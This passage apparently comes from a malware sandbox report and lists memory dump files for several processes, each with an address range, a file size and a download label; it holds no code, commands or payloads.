memory/1192-803-0x00007FF835150000-0x00007FF8357B5000-memory.dmp

Filesize
6.4MB

Download
memory/1192-811-0x00007FF849B50000-0x00007FF849B77000-memory.dmp

Filesize
156KB

Download
memory/1192-819-0x00007FF846F70000-0x00007FF846F9B000-memory.dmp

Filesize
172KB

Download
memory/1192-817-0x00007FF849C70000-0x00007FF849C89000-memory.dmp

Filesize
100KB

Download
memory/1192-813-0x00007FF84BD70000-0x00007FF84BD7F000-memory.dmp

Filesize
60KB

Download
memory/1192-863-0x00007FF849B40000-0x00007FF849B4F000-memory.dmp

Filesize
60KB

Download
memory/1192-864-0x00007FF846E40000-0x00007FF846E76000-memory.dmp

Filesize
216KB

Download
memory/1192-865-0x00007FF846EE0000-0x00007FF846EED000-memory.dmp

Filesize
52KB

Download
memory/1192-866-0x00007FF846D00000-0x00007FF846D14000-memory.dmp

Filesize
80KB

Download
memory/1192-867-0x00007FF834C10000-0x00007FF835143000-memory.dmp

Filesize
5.2MB

Download
memory/1192-873-0x00007FF849B50000-0x00007FF849B77000-memory.dmp

Filesize
156KB

Download
memory/1192-872-0x00007FF846CD0000-0x00007FF846CDD000-memory.dmp

Filesize
52KB

Download
memory/1192-871-0x00007FF846430000-0x00007FF8464FE000-memory.dmp

Filesize
824KB

Download
memory/1192-870-0x00007FF846C90000-0x00007FF846CC3000-memory.dmp

Filesize
204KB

Download
memory/1192-914-0x00007FF8338D0000-0x00007FF833CF5000-memory.dmp

Filesize
4.1MB

Download
memory/1192-915-0x00007FF8460D0000-0x00007FF8460F5000-memory.dmp

Filesize
148KB

Download
memory/1192-883-0x00007FF846200000-0x00007FF846218000-memory.dmp

Filesize
96KB

Download
memory/1192-884-0x00007FF834A90000-0x00007FF834C0F000-memory.dmp

Filesize
1.5MB

Download
memory/1192-885-0x00007FF8460D0000-0x00007FF8460F5000-memory.dmp

Filesize
148KB

Download
memory/1192-886-0x00007FF846C90000-0x00007FF846CC3000-memory.dmp

Filesize
204KB

Download
memory/1192-888-0x00007FF846C40000-0x00007FF846C4B000-memory.dmp

Filesize
44KB

Download
memory/1192-869-0x00007FF846CE0000-0x00007FF846CF9000-memory.dmp

Filesize
100KB

Download
memory/1192-889-0x00007FF846310000-0x00007FF84631B000-memory.dmp

Filesize
44KB

Download
memory/1192-1296-0x00007FF8338D0000-0x00007FF833CF5000-memory.dmp

Filesize
4.1MB

Download
memory/1192-890-0x00007FF8461F0000-0x00007FF8461FC000-memory.dmp

Filesize
48KB

Download
memory/1192-1325-0x00007FF830920000-0x00007FF831CC7000-memory.dmp

Filesize
19.7MB

Download
memory/1192-891-0x00007FF8460C0000-0x00007FF8460CB000-memory.dmp

Filesize
44KB

Download
memory/1192-1346-0x00007FF835150000-0x00007FF8357B5000-memory.dmp

Filesize
6.4MB

Download
memory/1192-1365-0x00007FF8460D0000-0x00007FF8460F5000-memory.dmp

Filesize
148KB

Download
memory/1192-892-0x00007FF8460B0000-0x00007FF8460BC000-memory.dmp

Filesize
48KB

Download
memory/1192-893-0x00007FF8460A0000-0x00007FF8460AB000-memory.dmp

Filesize
44KB

Download
memory/1192-894-0x00007FF846090000-0x00007FF84609C000-memory.dmp

Filesize
48KB

Download
memory/1192-895-0x00007FF846080000-0x00007FF84608D000-memory.dmp

Filesize
52KB

Download
memory/1192-896-0x00007FF846070000-0x00007FF84607E000-memory.dmp

Filesize
56KB

Download
memory/1192-897-0x00007FF846370000-0x00007FF846423000-memory.dmp

Filesize
716KB

Download
memory/1192-1821-0x00007FF849B40000-0x00007FF849B4F000-memory.dmp

Filesize
60KB

Download
memory/1192-1835-0x00007FF846060000-0x00007FF84606C000-memory.dmp

Filesize
48KB

Download
memory/1192-1834-0x00007FF846200000-0x00007FF846218000-memory.dmp

Filesize
96KB

Download
memory/1192-1833-0x00007FF846C50000-0x00007FF846C77000-memory.dmp

Filesize
156KB

Download
memory/1192-1832-0x00007FF846C80000-0x00007FF846C8B000-memory.dmp

Filesize
44KB

Download
memory/1192-1831-0x00007FF846150000-0x00007FF8461D7000-memory.dmp

Filesize
540KB

Download
memory/1192-1830-0x00007FF845FE0000-0x00007FF845FED000-memory.dmp

Filesize
52KB

Download
memory/1192-1829-0x00007FF835150000-0x00007FF8357B5000-memory.dmp

Filesize
6.4MB

Download
memory/1192-1828-0x00007FF846430000-0x00007FF8464FE000-memory.dmp

Filesize
824KB

Download
memory/1192-965-0x00007FF845FE0000-0x00007FF845FED000-memory.dmp

Filesize
52KB

Download
memory/1192-1826-0x00007FF846CE0000-0x00007FF846CF9000-memory.dmp

Filesize
100KB

Download
memory/1192-1825-0x00007FF8460D0000-0x00007FF8460F5000-memory.dmp

Filesize
148KB

Download
memory/1192-1824-0x00007FF846D00000-0x00007FF846D14000-memory.dmp

Filesize
80KB

Download
memory/1192-1823-0x00007FF846EE0000-0x00007FF846EED000-memory.dmp

Filesize
52KB

Download
memory/1192-1822-0x00007FF846E40000-0x00007FF846E76000-memory.dmp

Filesize
216KB

Download
memory/1192-1820-0x00007FF846F70000-0x00007FF846F9B000-memory.dmp

Filesize
172KB

Download
memory/1192-1819-0x00007FF849C70000-0x00007FF849C89000-memory.dmp

Filesize
100KB

Download
memory/1192-1818-0x00007FF84BD70000-0x00007FF84BD7F000-memory.dmp

Filesize
60KB

Download
memory/1192-1817-0x00007FF849B50000-0x00007FF849B77000-memory.dmp

Filesize
156KB

Download
memory/1192-1816-0x00007FF846CD0000-0x00007FF846CDD000-memory.dmp

Filesize
52KB

Download
memory/1192-1839-0x00007FF8461F0000-0x00007FF8461FC000-memory.dmp

Filesize
48KB

Download
memory/1192-1838-0x00007FF846310000-0x00007FF84631B000-memory.dmp

Filesize
44KB

Download
memory/1192-1837-0x00007FF846C40000-0x00007FF846C4B000-memory.dmp

Filesize
44KB

Download
memory/1192-1836-0x00007FF834C10000-0x00007FF835143000-memory.dmp

Filesize
5.2MB

Download
memory/1192-898-0x00007FF846060000-0x00007FF84606C000-memory.dmp

Filesize
48KB

Download
memory/1192-899-0x00007FF846050000-0x00007FF84605B000-memory.dmp

Filesize
44KB

Download
memory/1192-900-0x00007FF846030000-0x00007FF84603C000-memory.dmp

Filesize
48KB

Download
memory/1192-901-0x00007FF845FF0000-0x00007FF845FFB000-memory.dmp

Filesize
44KB

Download
memory/1192-902-0x00007FF846040000-0x00007FF84604B000-memory.dmp

Filesize
44KB

Download
memory/1192-903-0x00007FF845FE0000-0x00007FF845FED000-memory.dmp

Filesize
52KB

Download
memory/1192-904-0x00007FF845EB0000-0x00007FF845EC2000-memory.dmp

Filesize
72KB

Download
memory/1192-911-0x00007FF845EA0000-0x00007FF845EAA000-memory.dmp

Filesize
40KB

Download
memory/1192-912-0x00007FF845D40000-0x00007FF845D5C000-memory.dmp

Filesize
112KB

Download
memory/1192-905-0x00007FF845FD0000-0x00007FF845FDC000-memory.dmp

Filesize
48KB

Download
memory/1192-906-0x00007FF8423F0000-0x00007FF84241A000-memory.dmp

Filesize
168KB

Download
memory/1192-907-0x00007FF8423C0000-0x00007FF8423EF000-memory.dmp

Filesize
188KB

Download
memory/1192-908-0x00007FF846150000-0x00007FF8461D7000-memory.dmp

Filesize
540KB

Download
memory/1192-887-0x00007FF846430000-0x00007FF8464FE000-memory.dmp

Filesize
824KB

Download
memory/1192-882-0x00007FF834C10000-0x00007FF835143000-memory.dmp

Filesize
5.2MB

Download
memory/1192-877-0x00007FF846C80000-0x00007FF846C8B000-memory.dmp

Filesize
44KB

Download
memory/1192-878-0x00007FF846C50000-0x00007FF846C77000-memory.dmp

Filesize
156KB

Download
memory/1192-879-0x00007FF846D00000-0x00007FF846D14000-memory.dmp

Filesize
80KB

Download
memory/1192-876-0x00007FF846150000-0x00007FF8461D7000-memory.dmp

Filesize
540KB

Download
memory/1192-875-0x00007FF849B40000-0x00007FF849B4F000-memory.dmp

Filesize
60KB

Download
memory/1192-874-0x00007FF846370000-0x00007FF846423000-memory.dmp

Filesize
716KB

Download
memory/1192-868-0x00007FF835150000-0x00007FF8357B5000-memory.dmp

Filesize
6.4MB

Download
memory/4560-1108-0x0000000000400000-0x0000000000500000-memory.dmp

Filesize
1024KB

Download
memory/4700-1198-0x0000000005800000-0x0000000005A14000-memory.dmp

Filesize
2.1MB

Download
memory/4700-1231-0x0000000006710000-0x0000000006722000-memory.dmp

Filesize
72KB

Download
memory/4700-1259-0x0000000008F50000-0x0000000008F8C000-memory.dmp

Filesize
240KB

Download
memory/4700-1110-0x00000000002D0000-0x0000000000314000-memory.dmp

Filesize
272KB

Download
memory/4700-1112-0x0000000005250000-0x00000000057F6000-memory.dmp

Filesize
5.6MB

Download
memory/4700-1128-0x0000000004CA0000-0x0000000004D32000-memory.dmp

Filesize
584KB

Download
memory/4700-1196-0x0000000004E30000-0x0000000004E3A000-memory.dmp

Filesize
40KB

Download
memory/4752-1230-0x00007FF813070000-0x00007FF813080000-memory.dmp

Filesize
64KB

Download
memory/4752-1227-0x00007FF815C10000-0x00007FF815C20000-memory.dmp

Filesize
64KB

Download
memory/4752-1226-0x00007FF815C10000-0x00007FF815C20000-memory.dmp

Filesize
64KB

Download
memory/4752-1225-0x00007FF815C10000-0x00007FF815C20000-memory.dmp

Filesize
64KB

Download
memory/4752-1228-0x00007FF815C10000-0x00007FF815C20000-memory.dmp

Filesize
64KB

Download
memory/4752-1229-0x00007FF815C10000-0x00007FF815C20000-memory.dmp

Filesize
64KB

Download
memory/4752-1232-0x00007FF813070000-0x00007FF813080000-memory.dmp

Filesize
64KB

Download